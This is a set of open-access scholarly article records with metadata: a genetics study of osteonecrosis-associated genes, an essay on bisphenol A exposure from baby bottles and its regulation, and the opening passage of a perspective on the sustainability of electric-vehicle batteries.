Open Access This article is licensed under a Creative Commons Attribution-NonCommercial-ShareAlike 4.0 International License, which permits use, share -copy and redistribute the material in any medium or format, adapt -remix, transform, and build upon the material, as long as you give appropriate credit, provide a link to the license, and indicate if changes were made. You may do so in any reasonable manner, but not in any way that suggests the licensor endorses you or your use. You may not use the material for commercial purposes. If you remix, transform, or build upon the material, you must distribute your contributions under the same license as the original. You may not apply legal terms or technological measures that legally restrict others from doing anything the license permits. The images or other third party material in this article are included in the article's Creative Commons license, unless indicated otherwise in a credit line to the material. If material is not included in the article's Creative Commons license and your intended use is not permitted by statutory regulation or exceeds the permitted use, you will need to obtain permission directly from the copyright holder. To view a copy of this license, visit https://creativecommons.org/licenses/by-nc-sa/4.0/. | 2023-05-31T15:12:23.217Z | 2023-04-30T00:00:00.000 | {
"year": 2023,
"sha1": "71881bdc9833018190dddec019a73c265a27a15d",
"oa_license": "CCBY",
"oa_url": "https://www.jmust.org/elib/journal/doi/10.35460/2546-1621.2023-0032/pdf",
"oa_status": "HYBRID",
"pdf_src": "Anansi",
"pdf_hash": "b8d4277f71692d12923d6c40a5a9470c7fa85057",
"s2fieldsofstudy": [
"Psychology"
],
"extfieldsofstudy": []
} |
235354577 | pes2o/s2orc | v3-fos-license | Integrating Transcriptome-Wide Association Study and mRNA Expression Profiling Identifies Novel Genes Associated With Osteonecrosis of the Femoral Head
Objective This study aims to identify novel candidate genes associated with osteonecrosis of the femoral head (ONFH). Methods A transcriptome-wide association study (TWAS) was performed by integrating the genome-wide association study dataset of osteonecrosis (ON) in the UK Biobank with pre-computed mRNA expression reference weights of muscle skeleton (MS) and blood. The ON-associated genes identified by TWAS were further subjected to gene ontology (GO) analysis by the DAVID tool. Finally, a trans-omics comparative analysis of TWAS and genome-wide mRNA expression profiling was conducted to identify the common genes and the GO terms shared by both DNA-level TWAS and mRNA-level expression profile for ONFH. Results TWAS totally identified 564 genes that were with PTWAS value <0.05 for MS and blood, such as CBX1 (PTWAS = 0.0001 for MS), SRPK2 (PTWAS = 0.0002 for blood), and MYO5A (PTWAS = 0.0005 for blood). After comparing the genes detected by TWAS with the differentially expressed genes identified by mRNA expression profiling, we detected 59 overlapped genes, such as STEAP4 [PTWAS = 0.0270, FC (fold change)mRNA = 7.03], RABEP1 (PTWAS = 0.010, FCmRNA = 2.22), and MORC3 (PTWAS = 0.0053, FCmRNA = 2.92). The GO analysis of TWAS-identified genes discovered 53 GO terms for ON. Further comparing the GO results of TWAS and mRNA expression profiling identified four overlapped GO terms, including cysteine-type endopeptidase activity (PTWAS = 0.0006, PmRNA = 0.0227), extracellular space (PTWAS = 0.0342, PmRNA = 0.0012), protein binding (PTWAS = 0.0112, PmRNA = 0.0106), and ATP binding (PTWAS = 0.0464, PmRNA = 0.0033). Conclusion Several ONFH-associated genes and GO terms were identified by integrating TWAS and mRNA expression profiling. It provides novel clues to reveal the pathogenesis of ONFH.
INTRODUCTION
Osteonecrosis (ON) is a common orthopedic disorder, the pathological features of which is the death of bone cells owing to the decrease of blood flow (Assouline-Dayan et al., 2002). Although ON can occur at different skeletal sites, such as the hips, jaw, knees, shoulders, and ankles, the femoral head is the mostly affected one. There are 20,000 to 30,000 new cases of osteonecrosis of the femoral head (ONFH) in the United States every year, of which about 5-10% end up with total hip replacement .
Osteonecrosis is a complex multifactorial disease which is affected by both genetic elements and environmental factors (Baek et al., 2017). The risk factors for developing ON include serious trauma, corticosteroid medications, immunosuppressive therapy, autoimmune diseases, and chronic alcohol intake (Mont et al., 2000;Gladman et al., 2001). During the past decades, a number of genetic factors for ON have been conducted, linking specific genes or susceptibility loci to the pathogenesis of ON (Hadjigeorgiou et al., 2008;Karol et al., 2015;Sun et al., 2015;Zhou et al., 2015). For example, a meta-analysis study reported that vascular endothelial growth factors, endothelial nitric oxide synthase, and ATP-binding cassette subfamily B member 1 transporter (ABCB1) polymorphisms were associated with the risk of ONFH . Another study observed that glucocorticoid-associated ON was associated with the genetic locus near the glutamate receptor gene (Karol et al., 2015). The R192Q and rs662 polymorphisms in paraoxonase-1 were also reported to increase the susceptibility of ONFH (Hadjigeorgiou et al., 2007;Li et al., 2017). Hypofibrinolysis conferred by the 4G/4G plasminogen activator inhibitor-1 gene variant is a major predisposing factor for avascular ON in renal transplant patients (Ferrari et al., 2002). The genetic polymorphisms in ABCB1 gene (C3435T), apolipo-protein B (ApoB) gene (C7623T), and cAMPresponse element binding protein-binding protein (CBP) gene (rs3751845) increased and were helpful for predicting the risk of steroid-induced ONFH (Kuribayashi et al., 2008). However, previous studies mostly focused on single or several gene defects associated with ONFH, and a few large-scale genetic studies of ONFH have been conducted. The genetic mechanism of ON remains elusive now.
Genome-wide association studies (GWAS) is a powerful approach for identifying the susceptibility genes of complex diseases or traits. However, a great number of genetic variants affect complex traits by regulating gene expression and then changing the abundance of one or multiple proteins (Lappalainen et al., 2013;. For instance, the non-coding regulatory loci, such as expression quantitative trait loci and methylation quantitative traits loci (Grubert et al., 2015), can affect the risk of diseases through regulating the expression levels of disease-related genes. The GWAS-identified genetic loci are mostly located in the non-coding regulatory regions of genome. These causal genetic variants within non-coding regulatory regions are commonly indistinguishable from the neighboring markers and are likely to be missed in previous GWAS (Zhang and Lupski, 2015). In recent years, transcriptomewide association study (TWAS) has been proposed, which is capable of identifying disease-associated genes at the mRNA expression level (Gusev et al., 2016a). TWAS has been applied to the genetic studies of multiple complex human diseases and presents good performance for disease gene mapping (Gusev et al., 2016b;Thériault et al., 2017). For instance, Gusev et al. (2016b) performed a TWAS of schizophrenia through integrating a GWAS dataset of schizophrenia and mRNA expression references from the brain, blood, and adipose tissues. Finally, they identified 157 schizophrenia-associated genes, of which 35 were novel. Wu et al. (2018) performed a TWAS to evaluate the associations between genetically predicted gene expression level and breast cancer risk and identified 48 candidate genes for breast cancer.
In this study, using the latest GWAS dataset of ON obtained from the UK Biobank, we first conducted a TWAS to scan candidate genes for ON. The ON-associated genes identified by TWAS were further subjected to gene ontology (GO) enrichment analysis by DAVID tool. To validate the TWAS results of ON, we also compared the TWAS results with the mRNA expression profiles of ONFH to identify common genes and GO terms shared by TWAS and mRNA expression profiling.
GWAS Summary Dataset of ON
The GWAS summary dataset of ON was driven from the UK Biobank database 1 (Bycroft et al., 2018;Canela-Xandri et al., 2018). Briefly, the UK Biobank genetic dataset contains genome-wide genotype data for 452,264 participants, including 603 osteonecrosis patients, as defined by the International Classification of Diseases, Tenth Revision, (ICD-10) code "M87." DNA was extracted from frozen-stored blood samples and performed for genotyping using the marker content of the UK Biobank Axiom array. The samples were imputed by a new version of the program referred to as IMPUTE4. 2 Principal component analysis was applied to account for the population structure in both sample and marker-based quality control. The GWAS summary data contain 623,94 genotyped variants that passed quality control, 9,113,133 imputed variants that passed quality control, all 30,798,054 imputed variants available for downloading, and 9,113,133 imputed variants that passed quality control with a P different than 0 [for detailed information of the subjects, genotyping, imputation, and quality control, refer to the published studies (Bycroft et al., 2018;Canela-Xandri et al., 2018)].
Gene Expression Profile of BMSCs
The mRNA expression profiling data of bone marrow mesenchymal stem cells (BMSCs) of ONFH patients was used here (Wang et al., 2018). Briefly, three patients with steroidinduced ONFH and three control subjects were enrolled from the Department of Orthopedic. ONFH was diagnosed based on preoperative radiographs and magnetic resonance images.
Arraystar Human lncRNA microarray V3 (GPL16956), covering 26,109 mRNAs, was used for microarray analysis. Unpaired Student's t-test was performed to evaluate the differences between the two groups. False discovery rate controlling was used to correct the P-value with Benjamini-Hochberg algorithm in R 3.4.1 suite (Lucent Technologies). Differentially expressed mRNAs were identified at | fold change (FC)| > 2.0 and Benjamini-Hochberg-corrected P values < 0.05. A total of 838 up-regulated mRNAs and 1,937 down-regulated mRNAs were identified in the ONFH group [for a detailed description of samples, experimental design, statistical analysis, and quality control, refer to the previous study (Wang et al., 2018)].
TWAS of ON
TWAS of ON was performed using the FUSION software 3 through integrating the UK Biobank ON GWAS summary data and pre-computed gene expression reference weights of peripheral blood, whole blood, and muscle skeleton (Gusev and Ko, 2016). Briefly, the gene expression weights of a certain tissue were first calculated using the prediction models implemented in FUSION. For a given gene, Bayesian sparse linear mixed model (Zhou et al., 2013b) was firstly used to compute SNP expression weights in the 1-Mb cis locus: let w denote weights, Z denote ON Z scores, and L denotes SNP correlation (LD) matrix. The formula "Z TWAS = w Z/(w Lw) 1/2 " was then used to estimate the association between predicted expression and ON (Gusev and Ko, 2016). Finally, we got the gene-disease association by performing the expression imputation on chromosome one by one. In this study, the gene expression reference weight panels of peripheral blood (n = 1,247), whole blood (n = 1,264), and muscle skeleton (n = 361) were downloaded from the FUSION website. 4 P value was calculated by FUSION for each gene.
Gene Ontology Enrichment Analysis
The ON-associated genes identified by TWAS were further analyzed by the Database for Annotation, Visualization, and Integrated Discovery (DAVID) 5 for GO enrichment (Huang da et al., 2009). The differently expressed mRNA of ONFH was also subjected to GO enrichment analysis. Finally, the GO enrichment results of TWAS and mRNA expression profile were compared to identify common GO terms for ONFH.
Ethics
Our research data was downloaded from an online public database and does not involve ethical issues.
TWAS Results of ON
Transcriptome-wide association study of ON identified 154 genes with P value < 0.05 in MS, such as STPG1 (P TWAS = 0.0015), CTSS (P TWAS = 0.0022), and THEM4 (P TWAS = 0.01). The total 154 significant genes were presented in Supplementary Table 1. We also identified 128 genes with P values < 0.05 in peripheral blood (Supplementary Table 2) and 279 genes with P values < 0.05 in whole blood (Supplementary Table 3), such as GLT25D2 (P TWAS = 0.0078), VAMP4 (P TWAS = 0.0080), USP24 (P TWAS = 0.0022), and LAPTM5 (P TWAS = 0.0027). The top 10 significant genes identified by TWAS for ON are shown in Table 1.
GO Enrichment Analysis Results
Gene ontology enrichment analysis of the genes identified by TWAS detected 53 GO terms with P value < 0.05 for ON, such as mitochondrial matrix (P value = 0.0027), RNA catabolic process (P value = 2.91 × 10 −4 ), and membrane (P value = 0.0096). Further comparing the GO enrichment analysis results of TWAS and mRNA expression profiling detected four common GO terms, including cysteine-type endopeptidase activity (P TWAS = 0.0006, P mRNA = 0.0227), extracellular space (P TWAS = 0.0342, P mRNA = 0.0012), protein binding (P TWAS = 0.0112, P mRNA = 0.0106), and ATP binding (P TWAS = 0.0464, P mRNA = 0.0033).
DISCUSSION
Limited efforts have been paid to explore the genetic mechanism of ONFH by now. The genes implicated in the development of ON remain largely unknown. In this study, we conducted a genome-wide integrative analysis of TWAS and mRNA expression profiling by identifying multiple ONFH-associated genes, such as STEAP4, RABEP1, and MORC3. STEAP4 encodes a protein that belongs to the six transmembrane epithelial antigens of prostate (STEAP) family and resides in the Golgi apparatus. Previous studies demonstrated that STEAP4 is involved in responses to inflammatory and glucose metabolism (Wellen et al., 2007;ten Freyhaus et al., 2012;Kim et al., 2015). In addition, there is a study which identified that STEAP4 links to inflammation and colon cancer as a critical regulator of mitochondrial dysfunction (Xue et al., 2017). There has been no study report about STEAP4 in ON. However, one study indicated that STEAP4 had a critical role in cellular iron uptake and utilization in osteoclasts and was indispensable for osteoclast development and function (Zhou et al., 2013a). Impaired blood supply to the bone is associated with ON. Therefore, our result suggested that STEAP4 may be a regulator for iron uptake and utilization to link blood circulation and ON.
MORC3 encodes MORC family CW-type zinc finger protein 3, which localizes to the nuclear matrix. A previous study conducted by Jadhav et al. (2016) showed that MORC3 mutant mice exhibit bone cell differentiation. Furthermore, the localization of morc3 protein in (MUT±) osteoclasts and (MUT±) mice in the nuclear membrane to the cytoplasm, the localization of MORC3 protein in MORC3 (mut±) osteoclasts, and MORC3 (mut±) mice transferring from the nuclear membrane to the cytoplasm displayed increased osteoblast differentiation and altered gene expression (Jadhav et al., 2016). Another study demonstrated that MORC3 mutant mice exhibited reduced cortical thickness and area, followed by changed hematopoietic stem cell niche and bone cell differentiation (Hong et al., 2017).
RABEP1 encodes Rab GTPase-binding effector protein 1. It belongs to rabaptin protein family. It has been demonstrated that hypoxia was implicated in the development of bone diseases, including ON (Liu et al., 2015;Yin et al., 2020). A recent study investigated the role of hypoxia and hypoxia-inducible factor 1α (HIF-1α) in fibrodysplasia ossificans progressiva (FOP). They found that HIF-1α could increase the duration and intensity of BMP signaling through RABEP1-mediated retention of ACVR1 in hypoxic connective tissue progenitor cells from FOP patients (Wang et al., 2016). In addition, RABEP1 was identified as one of the novel candidate genes influencing spinal volumetric bone mineral density in rats (Alam et al., 2010).
Gene ontology enrichment analysis detected several GO terms, such as mitochondrial matrix, ATP binding, positive regulation of cell matrix adhesion, and RNA catabolic process. The mitochondrial matrix is the structural basis of energy metabolism and oxidative stress (Cadenas, 2018). A study indicated that steroid-associated mitochondrial injury and redox failure are important elements in the pathogenesis of ON (Tsuchiya et al., 2018). ATP binding is closely related to mitochondrial matrix. ABCB1 polymorphism contributes to the risk of ONFH Zhang et al., 2017). The positive regulation of cell matrix adhesion was identified to be implicated in the regulation of hypoxia (Zhang et al., 2018), which is one of the factors that cause apoptosis of bone cells (Seamon et al., 2012). In addition, RNA catabolic process is another identified GO enrichment term. Previous studies have demonstrated that RNA stability provides a rapid level of regulation that can have major effects in maintaining global inflammation (Herman and Autieri, 2018;Nyati et al., 2020).
To the best of our knowledge, this is the first TWAS of ON and identified multiple candidate genes whose imputed mRNA expression levels were associated with ON. To enhance the reliability and persuasiveness of our study, we further compared the TWAS results with the mRNA expression profiling of ONFH. We identified multiple common genes and GO terms shared by both DNA-level TWAS and mRNA expression profiling for ON. Despite that the power of TWAS is great, there are also two limitations that should be noted. Firstly, although TWAS is not confounded by reverse causality (disease→ expression independent of SNP), it is well nigh impossible to draw the instances of pleiotropy in statistics (where a SNP or linked SNPs affect ON and expression independently) and truly causal susceptibility genes. Secondly, there is some heterogeneity between GWAS data and gene expression profile. In detail, the GWAS data originate from European ON participants defined by ICD codes, while the gene expression data originate steroid-induced ONFH of Chinese ancestry. There has been lack of data set from the same ancestry and samples. Therefore, one should be careful in applying our study results, and further studies are needed to confirm our findings.
In summary, we conducted a genome-wide integrative analysis of TWAS and mRNA expression profiling of ON. We identified multiple candidate genes and their biological terms associated with ON. Our results provide novel clues for clarifying the pathogenesis of ON.
DATA AVAILABILITY STATEMENT
The original contributions presented in the study are included in the article/Supplementary Material, further inquiries can be directed to the corresponding author.
ETHICS STATEMENT
Ethical review and approval was not required for the study on human participants in accordance with the local legislation and institutional requirements. The patients/participants provided their written informed consent to participate in this study.
AUTHOR CONTRIBUTIONS
MM and PL carried out the rSNP analysis and drafted the manuscript. LL, SC, BC, CL, ST, WL, YW, XG, and CW participated in its design and helped to draft the manuscript. All authors read and approved the final manuscript.
FUNDING
This work was supported by the National Natural Scientific Foundation of China (82073495). | 2021-06-07T13:19:38.697Z | 2021-06-07T00:00:00.000 | {
"year": 2021,
"sha1": "687b21e9d830fc12cb949b60e2a1f012565853ab",
"oa_license": "CCBY",
"oa_url": "https://www.frontiersin.org/articles/10.3389/fgene.2021.663080/pdf",
"oa_status": "GOLD",
"pdf_src": "PubMedCentral",
"pdf_hash": "687b21e9d830fc12cb949b60e2a1f012565853ab",
"s2fieldsofstudy": [
"Medicine",
"Biology"
],
"extfieldsofstudy": [
"Medicine"
]
} |
16186024 | pes2o/s2orc | v3-fos-license | Babies, Bottles, and Bisphenol A: The Story of a Scientist-Mother
A scientist and mother who studies bisphenol A, a chemical found in plastic baby bottles and cups, wrestles with the disconnect between scientific evidence that the chemical poses a special risk to children and current laws and regulations.
Essay
July 2007 | Volume 5 | Issue 7 | e200 M y 11-month-old daughter loves her baby bottles and sippy cups (fi rst-person narrative is from the viewpoint of Rebecca Roberts). But as I sit and watch her drink from them, I cringe, because I happen to be a scientist who studies a chemical found in those bottles and cups. I also know that some scientifi c research suggests that exposure to that compound, called bisphenol A (BPA), is detrimental to good healthsomething I can't help but think about as I watch my daughter use her sippy cup as a teething ring.
As a scientist, I depend on evidence, logic, and imagination to explain observations made in the laboratory. I then interpret and communicate my fi ndings to the scientifi c community and the public. As a mother, I strive to raise a healthy and happy child. I make daily decisions about what my baby does and does not do, in order to limit her exposure to danger. In both of my roles, I depend on information: nonbiased, factual, evidence-based information. The mother in me relies on my training as a scientist to objectively look at scientifi c data in order to determine personal choices for my daughter. But, like all people, I am not qualifi ed, nor do I have the time, to understand all scientifi c issues. I must rely on others-on the brokers of information: other scientists, medical personnel, the government, regulatory agencies, corporations, nonprofi t organizations, and the media, to name a few.
The purveyors of information are not necessarily as objective, however, in their interpretation and dissemination of scientifi c data as my scientifi c self would like them to be-infl uenced as they are by timing, money, convenience, politics, and countless other agendas. I can only hope that the "facts" I receive are objective.
Moreover, I hope that any regulations stemming from this science are established for the benefi t of my family and society as a whole. But how is the information regarding the effect of BPA on human health being packaged and communicated to the general public? Let's begin by understanding what BPA is and how our modern society relies on it.
In 1952, chemists working with BPA discovered that it could help form a hard, clear plastic called polycarbonate. Polycarbonates make such products as compact discs, sunglasses, bicycle helmets, water and milk bottles, baby bottles, food storage containers, tableware, plastic windows, bulletresistant laminate, cell phones, car parts, toys, and some medical devices such as incubators, dialysis machines, and blood oxygenators. BPA is also used to make certain resins that are commonly found in the linings of food cans to prevent corrosion, and it is present in some polyvinyl chloride (PVC) plastic products, in white dental fi llings, dental sealants, and in some fl ame retardants. In keeping with its widespread applications, BPA ranks among the highest-volume chemicals manufactured worldwide, with an annual production in 2003 of about 13 billion kilograms [1,2]. Regulation requiring a signifi cant reduction in BPA production and use could have a dramatic economic impact and would likely require some changes in personal lifestyle.
BPA has been shown to leach from water bottles and food cans into the packaged foodstuffs. It then enters the body through the digestive tract when those foods are consumed. The level of BPA released from plastic depends on the age and wear of the plastic and on exposure to heat. For example, one study showed that small levels of BPA leached from baby bottles subjected to simulated normal uses, including boiling, washing with a bottle brush, and dishwashing [3]. Plastic tableware (such as those used in some schools) was also found to release BPA into hot vegetable soup [2]. Older, worn bottles and bowls released BPA more readily than newer products [2,3]. BPA is also present in rivers and streams and in drinking water, presumably due to leaching from plastic items in landfi lls [4][5][6]. A survey by the Centers for Disease Control and Prevention found that approximately 95% of Americans have detectable levels of BPA in their bodies [7].
Naturally, the prevalence of human exposure leads to questions about safety and health. Although the plastic industry continues to assert that BPA is safe, the chemical's endocrinedisrupting properties raise concern about its potential to cause harm. BPA exposure affects the hormonal system, in particular, the pathway involving estrogen; its effects have been studied on cells, tissues, and whole organisms. In adult male mice and rats, effects of BPA exposure-abnormal sperm and reduced fertility-were reversed when exposure stopped [8]. Of the few human epidemiological studies, one revealed a relationship between BPA exposure and repeated miscarriage [9]. Additionally, BPA causes a human breast cancer cell line to proliferate, indicating that estrogen-sensitive tissues
Babies, Bottles, and Bisphenol A: The Story of a Scientist-Mother
and cells in the body may react similarly [10].
Many animal studies focus on the effect of BPA exposure during fetal development, when cells and tissues are especially susceptible to hormonal alterations. Not only does BPA disrupt proper functioning of the placenta during gestation, but it causes many deleterious health effects in offspring exposed in utero [11], including enlarged prostates, malformed urethra [12,13], and a higher risk of prostate cancer in male offspring [14], and genital tract alterations [12,13] and earlier puberty in female offspring [13]. Exposure also affects brain development, causing behavioral differences between males and females to be lost in offspring exposed in the uterus [15]. A similar correlation to human development is plausible. Indeed, BPA has been found in the bloodstream, placenta, cord blood, and fetal blood of humans at levels that are within the range studied in many of the animal models [16].
Although BPA was not used in plastics manufacturing until the 1950s, its hormonal activity was reported in 1936 [17]. For decades, products containing BPA were shown not to release the compound, and thus these products were deemed safe. Indeed, the current Environmental Protection Agency (EPA) regulation regarding allowable levels of BPA exposure is based on these early fi ndings. As recently as 1999, an offi cial of the Food and Drug Administration (FDA) stated that no BPA was detected in liquid stored in baby bottles under typical use conditions [18].
That same year, however, scientifi c techniques progressed such that very small levels of BPA could fi nally be measured accurately. Levels as low as parts per billion (ppb) are now routinely detected in the laboratory. Unfortunately, the ability to detect such low levels in a laboratory environment is often not good enough, since tissues and cells can respond to levels of BPA that are 100 times lower [19]. The fi rst such study showing a detrimental effect of BPA at very low doses was published in 1997, and since then, over 100 other studies have been published [19,20].
Let's step back a moment and consider the roles of United States regulatory agencies such as the FDA and the EPA in determining the so-called safe human exposure level for a chemical. Founded in 1906 the FDA focuses on ensuring safety of food, drugs, and medical products. Much later, in 1970, the EPA was established to protect human health in general and safeguard the environment by consolidating the varied efforts of research, monitoring, standard-setting, and enforcement. Six years after the creation of the EPA, the Toxic Substances Control Act was passed by Congress. This Act gave the EPA the power to control chemicals that pose an unreasonable risk to human health or the environment. In other words, the EPA was charged with determining the safe human exposure level for chemicals. Since taking on this daunting task of monitoring the roughly 75,000 chemicals produced in or imported into the US, the EPA has taken action to reduce the risk of over 3,600 chemicals but has banned or limited the production or use of only fi ve. Currently, the EPA lists the "safe level" for BPA as being 50 micrograms (or 0.00005 grams) of BPA per kilogram of body weight per day [21]. Following this guideline, a person weighing 140 pounds (approximately 63 kg) could "safely" ingest 0.003 grams of BPA per day, or a little over a gram of BPA each year. This "safe" level is much higher than the low doses to which people are routinely exposed.
At this point, you might be wondering why this is the fi rst time you've ever heard of BPA. The information is out there but it is a puzzle to get through. Early studies indicated that BPA did not leach or leached in very small amounts from plastic products, including baby bottles. These studies are often referred to by those in the chemical industry, such as the American Plastics Council-who have a vested interest in maintaining the use of BPA in plastics production, to verify the safety of the products [22]. However, since 1999 many studies have shown that BPA leaches from products at levels known to cause health effects in animals. Earlier studies on BPA exposure also tended to fi nd little resulting adverse health effects, yet these studies were often using doses that were higher than those now regarded as being in an environmentally relevant range-that is, the low doses that humans are exposed to regularly and that fi t within the so-called "low-dose theory" that claims that lower doses can be more harmful than higher doses [23,24]. These were the main studies initially used by the EPA to determine the "safe" level of BPA exposure and that are often referenced to attest to the safety of BPA [21,22].
Because of this ambiguity, fi ndings can be obscured by those who inform the public, especially those with a vested interest in BPA production and usage. As a result, the media presents a confusing and unclear picture of the health risks of BPA exposure by giving equal weight to statements from independent scientists and those working for industry. The resulting infl uence of this ambiguity was recently revealed in the spring of 2006 when US state legislators in California, Maryland, and Minnesota attempted to pass legislation that would ban the use of BPA in products aimed at children. None of them passed.
The bills focused on children because they are far more susceptible to adverse affects from chemical exposures than adults, even at very low doses. The biological processes involved in their ongoing development are vulnerable to disruption by BPA and their ability to metabolically detoxify such contaminants is not yet mature. Moreover, children are more likely to be exposed to BPA orally because of their need to put things in their mouth-a purpose for which some BPA-containing products, such as some baby bottles and teething rings, are specifi cally designed.
The California bill (AB319) was introduced in February 2005, making it the fi rst such legislation to be introduced in any state. Sponsored by Assembly Member Wilma Chan (Democrat), AB319 called for any BPAcontaining products, including toys or childcare articles, intended for use by a child 3 years old or younger to be prohibited in the state. (It also sought to ban other harmful chemicals such as phthalates.) Violators of the ban would face civil action, carried out by the Attorney General, and penalties of no less then US$10,000 for each day of violation [25]. The fact sheet accompanying the bill states, "AB319 recognizes that we must act now to prevent exposure by eliminating at the source the chemicals, such as Bisphenol-A and Phthalates that pollute our bodies. By making intelligent decisions about what chemicals we allow into the environment, we can prevent unnecessary exposures to dangerous substances. Furthermore, children are incredibly sensitive to chemical pollution…. Some chemicals are simply too toxic and dangerous to children, to allow exposures to continue." The bill was energetically opposed by stakeholders in the chemical, plastics, baby products, and grocery industries. Under the umbrella organization Coalition for Consumer Choice, the NoAB319 campaign successfully fought the bill both in the media and in the Assembly hearing. In a news release by NoAB319, Steve Hentges, executive director of the Polycarbonate Business Unit of the American Plastics Council, stated that the legislation was "founded on insubstantial claims and unproven hypotheses that lack scientifi c rigor." The contradictory information set forth by the proponents and opponents of the bill ultimately led to its death in the Appropriations Committee, even after an amendment removed the BPA provisions, because of one vote. San Francisco Democrat Leland Yee, according to a spokesman, "decided that the decisions to ban chemicals should be left to health experts, not politicians, especially after scientists gave confl icting testimony at an Assembly hearing last week." [26]. Fortunately, Chan intends to resubmit the bill and Yee said he "would support a new bill if it authorized state health offi cials to evaluate the risks and make the decision." [26].
At a more local level, the fi rst legislation to ban BPA from products aimed at children passed in the city of San Francisco. The "Stop Toxic Toys" bill was virtually identical to AB319 and was signed into law on June 16,2006. However, in April 2007, the clause limiting BPA in child-aimed products was repealed pending action at the state level. As a result, no action on BPA-containing products will occur in the city until January 2008, and only then if the state has not taken appropriate actions to reduce its use at the state level. While the initial San Francisco legislation was an important step, such a piecemeal approach to controlling BPA exposure, especially in young children, is not perfect. Companies and businesses are bound to have diffi culty conforming to a variety of regulations. Although BPAfree alternatives are often available, consumers in areas with legislation may fi nd a lack of choices when it comes to plastic products on the store shelves.
Ideally the national regulatory agencies should step in to minimize these problems.
At the national level, the White House disputes the "low-dose theory" and has proposed funding cuts for EPA research on endocrine disrupting chemicals such as BPA; however, the US Congress has maintained the funding level [27]. The EPA has revisited safe exposure levels of other chemicals. For example, in 2001, the EPA reduced the allowable level of arsenic in drinking water from 50 ppb to 10 ppb. It should do the same for BPA.
Currently, both the EPA and the European Food Safety Authority (EFSA) have set the "safe" level of exposure to BPA to 0.00005 grams per kilogram of body weight per day. Although diffi cult to estimate accurately, humans are typically exposed to about 0.000001 grams of BPA per kilogram of body weight per day. This is 50 times lower than the EPA-and EFSA-deemed "safe" limit. Unfortunately, this level of exposure is still signifi cantly higher than the low doses that some studies have shown to cause adverse health effects. Moreover, the levels of BPA found by the Center for Disease Control and Prevention to be present in the bodies of Americans appear to be too high to be explained by exposure to known sources of BPA [7]. Thus, there is a clear need for further health studies on BPA exposure and for regulatory agencies to continue to monitor the science behind the politics. An attentive assessment of the risk of human exposure to BPA may prompt the plastics industry and manufacturers of products containing BPA to reevaluate their use of BPA and opt for BPA-free alternatives.
In the meantime, what is the scientist-mother to do? The mother in me still waits anxiously for the regulatory agencies and the legislature to catch up with the research on BPA that the scientist in me appreciates. I have switched my brand of sippy cups to one that doesn't contain BPA (a quick internet search will yield many sites describing these and other BPA-free baby products). Nevertheless, while I feel proactive as I watch my daughter happily drink her water, I still cringe a little bit when she drops the sippy cup, toddles over to her toy bin, and starts to gnaw on her plastic turtle instead. | 2014-10-01T00:00:00.000Z | 2007-07-01T00:00:00.000 | {
"year": 2007,
"sha1": "122fad54afa55e200f26bedf61f7aeba46b90716",
"oa_license": "CCBY",
"oa_url": "https://journals.plos.org/plosbiology/article/file?id=10.1371/journal.pbio.0050200&type=printable",
"oa_status": "GOLD",
"pdf_src": "PubMedCentral",
"pdf_hash": "122fad54afa55e200f26bedf61f7aeba46b90716",
"s2fieldsofstudy": [
"Biology",
"Chemistry",
"Environmental Science"
],
"extfieldsofstudy": [
"Biology",
"Medicine"
]
} |
248703877 | pes2o/s2orc | v3-fos-license | Sustainable Electric Vehicle Batteries for a Sustainable World: Perspectives on Battery Cathodes, Environment, Supply Chain, Manufacturing, Life Cycle, and Policy
Li‐ion batteries (LIBs) can reduce carbon emissions by powering electric vehicles (EVs) and promoting renewable energy development with grid‐scale energy storage. However, LIB production and electricity generation still heavily rely on fossil fuels at present, resulting in major environmental concerns. Are LIBs as environmentally friendly and sustainable as expected at the current stage? In the past 5 years, a skyrocketing growth of the EV market has been witnessed. LIBs have garnered huge attention from academia, industry, government, non‐governmental organizations, investors, and the general public. Tremendous volumes of LIBs are already implemented in EVs today, with a continuing, exponential growth expected for the years to come. When LIBs reach their end‐of‐life in the next decades, what technologies can be in place to enable second‐life or recycling of batteries? Herein, life cycle assessment studies are examined to evaluate the environmental impact of LIBs, and EVs are compared with internal combustion engine vehicles regarding environmental sustainability. To provide a holistic view of the LIB development, this Perspective provides insights into materials development, manufacturing, recycling, legislation and policy, and beyond. Last but not least, the future development of LIBs and charging infrastructures in light of emerging technologies are envisioned.
the life cycle ( Figure 1b). [4] However, electricity generation leads to large variations of the total lifetime emissions ( Figure 1b). [4] Specifically, the electricity generation source can greatly affect total emissions (Figure 1c). [4] As of 2019, renewable energy sources account for 65% of power generation in Canada, and nuclear energy accounts for 17%, resulting in comparatively low CO 2 emissions of 132 gCO 2 kWh −1 (Figure 1c). In Indonesia, however, fossil fuels account for 83% of electrical generation. The emission during electricity generation in Indonesia was 761 gCO 2 kWh −1 , which was nearly six times higher than that of Canada ( Figure 1c). [4] The total emissions during electricity generation increase as the countries or regions rely more on fossil fuels (Figure 1c). To summarize, EVs generate lower lifetime emissions than their ICEV counterparts do. This is in good agreement with the literature. [5] In addition, increasing the share of renewable energy sources in the electricity generation mix can further enhance the environmental benefits of vehicle electrification. LIBs, being one of the most critical components of EVs, play a significant role in determining the long-term sustainability of the EV industry.
The development of LIBs needs to be driven in a more sustainable direction to satisfy the rising energy demand and simultaneously meet the criteria for net-zero carbon emissions. In this regard, it is crucial to assess the environmental impact and energy consumption of LIBs throughout the life cycle. Cathodes are a critical component of batteries and contribute considerably to the production cost of LIBs. [6] At present, cathodes still rely on scarce metals substantially, such as Ni and Co. These metals are less favorable in the cathode market due to their limited reserves and high price. Advancement of LIBs at the cathode materials level is required to balance sustainability, cost, and performance. More practical factors in industrial manufacturing need to be considered upon the commercialization of research-level materials and designs. Reliable LIB manufacturing requires the support from a robust supply chain. Evaluating the global LIB supply chain and manufacturing is critical to comprehend LIB development. In addition, massive LIBs will reach their end-of-life in the foreseeable future, given the substantial and increasing number of EVs around the world. Processing, repurposing, and recycling of these used [3] b) Comparison of life-cycle GHG emissions of a mid-size EV and ICEV. [4] c) Electricity generation mix and emissions from electricity generation in selected regions in 2019. [4] Overall, EVs have less GHG emissions than displaced ICEVs, after considering the processes of mineral mining, battery assembling, vehicle manufacturing, and vehicle operation. However, the emissions of EVs largely depend on the source of electricity generation. The countries that heavily rely on fossil fuels have more emissions. To reduce the emissions of EVs, optimizing the electricity generation mix and developing renewable energy are of crucial importance. The figure is made based on the data from refs. [3] and [4].
